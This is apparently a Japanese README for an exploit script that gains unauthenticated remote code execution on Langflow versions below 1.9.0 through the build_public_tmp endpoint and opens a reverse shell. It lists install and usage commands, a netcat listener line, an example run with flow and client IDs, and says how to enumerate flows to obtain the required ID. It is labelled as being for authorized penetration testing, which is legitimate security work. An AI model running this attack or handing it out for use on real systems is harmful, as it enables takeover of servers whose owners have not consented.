
Langflow <1.9.0 の build_public_tmp エンドポイントを介した認証されていないリモートコード実行のエクスプロイト。許可された侵入テスト用にリバースシェルを配信します。
build_public_tmp エンドポイントを介した Langflow のリモートコード実行 (RCE)。
ターゲット上でリバースシェルを実行する Public Flow Build エンドポイントを介したエクスプロイト。
httpx ライブラリインストール:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : Langflow インスタンスのベース URL (例: https://flow.example.com/)-l, --lhost : リバースシェルを受信するあなたの IP アドレス-p, --lport-f --flow-id : 対象フロー ID (必須 – /api/v1/flows/ または UI から取得)-c --client-id : セッション識別用の client_id クッキー値リスナーを起動します:
nc -nlvp 9001
エクスプロイトを実行します:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
成功すると、対話型の bash シェルが取得できます。
flow-id が必要です。GET /api/v1/flows で全フローを一覧表示するか、ブラウザの URL からコピーしてください。MIT – 教育および倫理的なセキュリティ研究のためのものです。